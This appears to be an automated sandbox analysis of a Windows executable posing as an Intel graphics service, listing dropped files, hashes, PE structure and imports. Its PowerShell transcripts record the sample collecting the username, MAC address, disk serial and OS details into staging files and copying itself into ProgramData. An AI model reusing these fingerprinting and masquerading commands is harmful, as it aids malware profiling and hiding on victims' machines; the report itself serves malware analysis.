                                        Preview: EkUSaowoJc4CawFMNAUu37bQ4MtbTzhqKyuau06YGsWVXynPHsUscThvNzzlmT5r1s8qnB8kuut+C/TziZmT/IeK1y8eGfypKdG1rg9nFWfHPXXias/jX5NW66Z/89zXz5XSf4REo6CLPLWYLvwWy50nri1OKMvrfM8bIdoZ4KX3bOR8l26JxA==
                                        C:\ProgramData\SystemData\tempi1.txt
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                        Category:modified
                                        Size (bytes):194
                                        Entropy (8bit):2.8825288764544323
                                        Encrypted:false
                                        SSDEEP:3:QsvlkVXuiiFXoslUMLl8JLl1LR9AnV38nl3ZFlR4TTAmvn:QsGV+veEU+8JsnSl3h6wmvn
                                        MD5:496628AF3CBB4554D78D187F73CB59B5
                                        SHA1:AA682421F24FF4A0CE9B0A8F56D6E045575D90FE
                                        SHA-256:6D176DCFB156C12A6309D37F7842FB0478EFD9C147A41AE3B999DDE380B738EB
                                        SHA-512:A9306CB682631C03A82D6327AE6545C51CF5E9877EC0A0CAED031210724D955263284D624B34BD912D9219971EB53C973707D8A21396FEDCC6A9A58DB76CF3C8
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ..I.P.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .....{.".1.9.2...1.6.8...2...4.".,. .".f.e.8.0.:.:.7.c.7.0.:.8.3.1.f.:.f.0.5.8.:.6.d.e.3.".}. . .....
                                        C:\ProgramData\SystemData\tempi2.txt
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):96
                                        Entropy (8bit):3.6368782373574886
                                        Encrypted:false
                                        SSDEEP:3:jhzW/F/fKJbRHYn4cFNrYy:NGNUbOVYy
                                        MD5:CC05004BDC260919A7169E1AC1121DBE
                                        SHA1:848DC48B8F256D57D9D1F9A332DF1D66D2C237D1
                                        SHA-256:7FEB02B5EC03FF5D7C68E75DAC0625284EC78A90488CE3DA2CCFD4F5EA79B51B
                                        SHA-512:9D0E82A92CFD64D46372B80C055FEBAB1776AB9423942588402ECEA543EFE146ECA8D8F3C5B7C5447BAEF6AF3D13EA34E6666DB1C07E69582A1559E9EEDCBFF9
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: IPAddress ..{"192.168.2.4", "fe80::7c70:831f:f058:6de3"} ..
                                        C:\ProgramData\SystemData\tempo1.txt
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                        Category:modified
                                        Size (bytes):198
                                        Entropy (8bit):3.452949490699049
                                        Encrypted:false
                                        SSDEEP:3:QjeolVylRflyWdl+SliFlUdf1lAUpvLmolSNcXiUC+lpDekRyl9zLmUlzlzlUi/O:QT5Wn+Sk8dfI4j42veVvzfra8O
                                        MD5:A9575486EB252950DCE017DC76B6678E
                                        SHA1:675037DD1C39AC56D2DC5E7222241EC744DCA294
                                        SHA-256:96F80E4929FB5B75380194BE967EAF68A0E07C2D53DC11E4C60E6723E6DD8663
                                        SHA-512:170E4E99B422A17678FEA47DCEE2F7A0F5C552442B73ADED342D3A4027193CF6CB6288B5DCEFB3DE2AC85B798171CE116B09961A3F2C0AFD1F0B02D43551A9FE
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ..........C.a.p.t.i.o.n.=.M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .1.0. .P.r.o.....C.S.D.V.e.r.s.i.o.n.=.....O.S.A.r.c.h.i.t.e.c.t.u.r.e.=.6.4.-.b.i.t.....V.e.r.s.i.o.n.=.1.0...0...1.7.1.3.4.............
                                        C:\ProgramData\SystemData\tempo2.txt
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):98
                                        Entropy (8bit):4.791372630910509
                                        Encrypted:false
                                        SSDEEP:3:rmE72AujyM1K8v8WQoeGe2Q+RIwyxLsUhhUrn:yNZj1hbegBifUrn
                                        MD5:A734F3E910730F568B1AD916BD926073
                                        SHA1:8AC9F7A00C609F0E3CBF966CB2D066F0B80F3F84
                                        SHA-256:5EC5698BEE2B8AFDC6FFF935451D9974BAAAF9D5E06BCDCB556A6C3929B6DA94
                                        SHA-512:0E4287659A02950913E5863FB31C70E959FAD03AD9D5E60CE3A7E405A808167696D6443FA4D240346466CD273C48A3256444924CE2EA3EE627636C33ABFA89C3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ....Caption=Microsoft Windows 10 Pro..CSDVersion=..OSArchitecture=64-bit..Version=10.0.17134......
                                        C:\ProgramData\SystemData\temps1.txt
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):242
                                        Entropy (8bit):3.739356744046493
                                        Encrypted:false
                                        SSDEEP:3:mSGg0W/FLyzdAFFFFmQmeJIMLnQQqQiwxgCrHkuFs:Cg0G5ym/mQrlriwx/r5Fs
                                        MD5:2FCCE3E99FCA78AD8720C5AE2CE22338
                                        SHA1:3EAF399C91849D5372608F8971FB9487199109AB
                                        SHA-256:508F0B0C3CC7AC6E6CFDEFE7DA7CCBD2BE1A5E12C9E77D8FA97EF45FDF60A5C1
                                        SHA-512:782BCF1E171F8788C603CC5BEE7296D23DD2D2D617986560ACF660F725EC00C014079BE38597FA6AE5783208D413CFE9A9DD8D1177898021E3F13219A764D1AB
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ..Physical Address Transport Name ..=================== ==========================================================..EC-F4-BB-EA-15-88 \Device\Tcpip_{BB556C50-98D0-4585-A1ED-B2838757AE1B} ..
                                        C:\ProgramData\SystemData\temps2.txt
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):58
                                        Entropy (8bit):2.4233824111921316
                                        Encrypted:false
                                        SSDEEP:3:qX/zr:8
                                        MD5:4F3224A5B5F95FCBF9658ED91611F06E
                                        SHA1:E69D36D0B84DE026DC33D99B754941F2DD3E4E58
                                        SHA-256:CC21821ECE1FE5C09F4C0420F56336E3A2AAC0FA6C7D951CBC4CC5B9193E3A3F
                                        SHA-512:B8AE900A3DDDACCD4476997772093E365F9C8B42CB97A5D41D6F85B31C5AB8BDB237E8DAB7FB8AECBD38D23C96D0A7C1577CF1686C1BA032747166D8BAFFBEB3
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: SerialNumber .... .... ........
                                        C:\ProgramData\SystemData\tempu.txt
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):7
                                        Entropy (8bit):2.8073549220576046
                                        Encrypted:false
                                        SSDEEP:3:5n:5n
                                        MD5:478CC28C2191726D4ACF5AFE62FC0084
                                        SHA1:9B5D186B5B17501F81CD9AF1FE95752D9EB38689
                                        SHA-256:6CC86E4809193273E28FB7C7809F7065DD2BC33075E2DAC32953A75C20B67FEB
                                        SHA-512:DED4DC14E8D1B9C0BC29217F5E5A4EC05984CC1A3DB99CE6D602BF49FC543F0BD52E648D2C7DDE6AAAB3039A7638BFBB0DA039022FF40BD7D3DEFA988620B35D
                                        Malicious:true
                                        Reputation:unknown
                                        Preview: user..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5829
                                        Entropy (8bit):4.902247628650607
                                        Encrypted:false
                                        SSDEEP:96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
                                        MD5:F948233D40FE29A0FFB67F9BB2F050B5
                                        SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
                                        SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
                                        SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16500
                                        Entropy (8bit):5.545935071586312
                                        Encrypted:false
                                        SSDEEP:384:bt9MUq05qzYpZzH0wbv+puOMSBKnn3ljulmWTb8aepgvGmdnie9B:LJdsM4Kn1Clhsa+73gB
                                        MD5:7F96CE883A266E60A8E5D60C92C0DE5B
                                        SHA1:C53F6FEFE538E72FC1D57C9DEBE12A351560C174
                                        SHA-256:11C65A1A25FF9982A6A801DD365B9D288C0BBD89E6A2B8EA913D6BC1AF4E2DCB
                                        SHA-512:C2E6A34B67EE338FB6A617823A248F5327450215995A83CF8F3FEF68EFE9D9CB3B1FFACA2957B102EEDB6F61E82D9C645BDEBA5295F468209FEAE0848DED3233
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: @...e...........................i.....8.$.......................H...............<@.^.L."My...:)..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0cfw3gdv.gvv.psm1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bil51lnr.xyu.ps1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btj2vhwe.osx.ps1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hvbtqswx.dh0.psm1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ijgefb2u.3np.psm1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1
                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnb3nmgl.fjp.ps1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: 1
                                        C:\Users\user\Documents\20220111\PowerShell_transcript.216554.4pmPLteW.20220111170842.txt
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1069
                                        Entropy (8bit):5.153986935727605
                                        Encrypted:false
                                        SSDEEP:24:BxSAti7vBZdx2DOXUWMBvVWJHjeTKKjX4CIym1ZJXfBHnxSAZYC:BZyvjdoOsBEJqDYB1ZFBHZZYC
                                        MD5:CB53789CC714A667E74029088F9F50D9
                                        SHA1:1016B1A69BC411BF621C3905B0CA9DF3D593227E
                                        SHA-256:70FCB885A559453BB65973F7445C38C3D3484D769BDB36848F371E158859C921
                                        SHA-512:309984E6C9A3166CACA27655E50D2CB61EAFC60040A734CD5581A90BE3DF54A5A359FFEB26F05326294C187525972600AEC0C5FE5AB54F4FE454358869CB90EA
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20220111170843..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'..Process ID: 6036..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220111170843..**********************..PS>$env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'..**********************..Command start time: 20220111170950..**********************..PS>$global:?..True..**********************..Windows PowerShe
                                        C:\Users\user\Documents\20220111\PowerShell_transcript.216554.b7XBSQRk.20220111170801.txt
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1295
                                        Entropy (8bit):5.232215887354239
                                        Encrypted:false
                                        SSDEEP:24:BxSAd7vBZdx2DOXUWKYcdVWMHjeTKKjX4CIym1ZJXSYcvnxSAZl:BZpvjdoOqYceMqDYB1ZgYcfZZl
                                        MD5:CB0D3D5F1E80B3212CC0E595E1F88CFA
                                        SHA1:6441596A3D97022570DB0AE770E072C9BAE20890
                                        SHA-256:C11ADC0C743355B67BB54EADFEE176C636E6BDF9AE9E969F94F15DAB699D2176
                                        SHA-512:9678081F48381CF90E0047582EF057E5C534741B604F27AF46B7D4C35881FBAE95ACA305705DA0C0ACFE3BA7563A1D28D90E55DB8D3E6FB702B7DA59C271CE63
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20220111170813..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'..Process ID: 6936..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220111170813..**********************..PS>getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get Se
                                        C:\Users\user\Documents\20220111\PowerShell_transcript.216554.xGYTF23B.20220111170730.txt
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1095
                                        Entropy (8bit):5.197389475553531
                                        Encrypted:false
                                        SSDEEP:24:BxSAC7vBZdx2DOXUW8G0MIEWGHjeTKKjX4CIym1ZJXF0MIEnxSAZAi:BZ4vjdoOQGqDYB1ZnZZR
                                        MD5:994B8D8B3075A242315AED192D83D2AC
                                        SHA1:A137B4E0806E3500A3A36EAB88B5A414C61AA0BE
                                        SHA-256:77A42411AACC74613BBBF71DE55F1741080044C8B74B63D945EB21155FD86791
                                        SHA-512:8426F2768AB355B4AA95B73C4417967A4D3D09A543AA53C07BB28952877779CA51065CB48F5691090DD1EFD2B00A1F826E4A06AE1FCE793C898D67CC42F743FA
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20220111170742..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'..Process ID: 3160..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220111170743..**********************..PS>copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'..**********************..Command start time: 20220111171155..**********************..PS>$global:?..True..**************

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):6.560987668019584
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:IGFXCUISERVICE.exe
                                        File size:401920
                                        MD5:d90d0f4d6dad402b5d025987030cc87c
                                        SHA1:fad66bdf5c5dc2c050cbc574832c6995dba086a0
                                        SHA256:1ffd6559d21470c40dcf9236da51e5823d7ad58c93502279871c3fe7718c901c
                                        SHA512:c2faeacfd588585633630ad710f443a72c7617c2d5e37dbfe43570e6ac5904e4b81eb682356a48a93bb794ef5e9d8ad0d673966d57798079b4de62ea61241024
                                        SSDEEP:12288:m00VdXicNHeft0d/BiqpD9JD9lusIhAzhM2RdM:mrzXiu+FZqp72iDc
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@........................@...N.......N.......N...............................g.......g.R.....g.......Rich...................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x424dcb
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x61312A62 [Thu Sep 2 19:47:46 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:6
                                        OS Version Minor:0
                                        File Version Major:6
                                        File Version Minor:0
                                        Subsystem Version Major:6
                                        Subsystem Version Minor:0
                                        Import Hash:86f89939b4b0c19157649ce986ae170e

                                        Entrypoint Preview

                                        Instruction
                                        call 00007F9EE8E1158Fh
                                        jmp 00007F9EE8E10EEFh
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 00000324h
                                        push ebx
                                        push 00000017h
                                        call 00007F9EE8E32094h
                                        test eax, eax
                                        je 00007F9EE8E11077h
                                        mov ecx, dword ptr [ebp+08h]
                                        int 29h
                                        push 00000003h
                                        call 00007F9EE8E11249h
                                        mov dword ptr [esp], 000002CCh
                                        lea eax, dword ptr [ebp-00000324h]
                                        push 00000000h
                                        push eax
                                        call 00007F9EE8E1342Ah
                                        add esp, 0Ch
                                        mov dword ptr [ebp-00000274h], eax
                                        mov dword ptr [ebp-00000278h], ecx
                                        mov dword ptr [ebp-0000027Ch], edx
                                        mov dword ptr [ebp-00000280h], ebx
                                        mov dword ptr [ebp-00000284h], esi
                                        mov dword ptr [ebp-00000288h], edi
                                        mov word ptr [ebp-0000025Ch], ss
                                        mov word ptr [ebp-00000268h], cs
                                        mov word ptr [ebp-0000028Ch], ds
                                        mov word ptr [ebp-00000290h], es
                                        mov word ptr [ebp-00000294h], fs
                                        mov word ptr [ebp-00000298h], gs
                                        pushfd
                                        pop dword ptr [ebp-00000264h]
                                        mov eax, dword ptr [ebp+04h]
                                        mov dword ptr [ebp-0000026Ch], eax
                                        lea eax, dword ptr [ebp+04h]
                                        mov dword ptr [ebp-00000260h], eax
                                        mov dword ptr [ebp-00000324h], 00010001h
                                        mov eax, dword ptr [eax-04h]
                                        push 00000050h
                                        mov dword ptr [ebp-00000270h], eax
                                        lea eax, dword ptr [ebp-58h]
                                        push 00000000h
                                        push eax
                                        call 00007F9EE8E133A0h

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x5d4bc0x78.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x610000x3b8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x620000x38d4.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x585d00x1c.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x586c00x18.rdata
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x585f00x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x4a0000x1dc.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x48ddb0x48e00False0.509323408019data6.57262184076IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata0x4a0000x13f900x14000False0.460668945313data5.42470846624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x5e0000x21d00x1200False0.26953125data3.95317799649IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .rsrc0x610000x3b80x400False0.4111328125data3.18893503216IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x620000x38d40x3a00False0.670999461207data6.52552513001IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_VERSION0x610600x354dataEnglishUnited States

                                        Imports

                                        DLLImport
                                        KERNEL32.dllCreateDirectoryW, SizeofResource, HeapFree, GetModuleFileNameW, InitializeCriticalSectionEx, WaitForSingleObject, HeapSize, MultiByteToWideChar, Sleep, GetLastError, LockResource, DeleteFileW, GlobalFree, HeapReAlloc, RaiseException, FindResourceExW, LoadResource, FindResourceW, HeapAlloc, DecodePointer, HeapDestroy, DeleteCriticalSection, GetProcessHeap, WideCharToMultiByte, SleepEx, WriteConsoleW, CreateFileW, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, ReadConsoleW, ReadFile, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetConsoleMode, GetConsoleCP, FlushFileBuffers, GetFileType, SetFilePointerEx, CloseHandle, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, GetModuleHandleW, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, EncodePointer, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CompareStringW, LCMapStringW, GetLocaleInfoW, GetStringTypeW, GetCPInfo, OutputDebugStringW, RtlUnwind, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetStdHandle, WriteFile, GetFileSizeEx, SetEndOfFile
                                        SHELL32.dllShellExecuteW, ShellExecuteExW
                                        ole32.dllCoCreateInstance, CoUninitialize, CoInitialize
                                        OLEAUT32.dllSysAllocStringLen
